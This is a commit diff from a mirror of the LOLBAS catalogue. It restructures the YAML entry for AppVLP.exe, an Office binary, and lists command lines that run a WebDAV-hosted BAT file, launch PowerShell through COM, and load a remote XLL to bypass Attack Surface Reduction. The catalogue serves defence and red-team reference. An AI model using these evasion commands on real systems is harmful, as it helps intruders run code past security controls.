public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files

Browse Source
This commit is contained in:
Oddvar Moe
2018-09-26 11:41:58 +02:00
parent d48273583e
commit bac3b9e56c
38 changed files with 405 additions and 245 deletions
Download Patch File Download Diff File Expand all files Collapse all files

25
yml/OtherMSBinaries/Appvlp.yml
View File

@@ -7,7 +7,7 @@ Commands:
- Command: AppVLP.exe \\webdav\calc.bat
Usecase: Execution of BAT file hosted on Webdav server.
Description: Executes calc.bat through AppVLP.exe
Category: Execution
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -15,7 +15,7 @@ Commands:
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Category: Execution
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -23,21 +23,23 @@ Commands:
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Category: Execution
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 w/Office 2016
Full Path:
- C:\Program Files\Microsoft Office\root\client\appvlp.exe
- C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Code Sample: []
Detection: []
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://github.com/MoooKitty/Code-Execution
- https://twitter.com/moo_hax/status/892388990686347264
- https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
- https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
- Link: https://github.com/MoooKitty/Code-Execution
- Link: https://twitter.com/moo_hax/status/892388990686347264
- Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
- Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
Acknowledgement:
- Person: fab
Handle: '@0rbz_'
@@ -45,3 +47,4 @@ Acknowledgement:
Handle: '@moo_hax'
- Person: Matt Wilson
Handle: '@enigma0x3'
---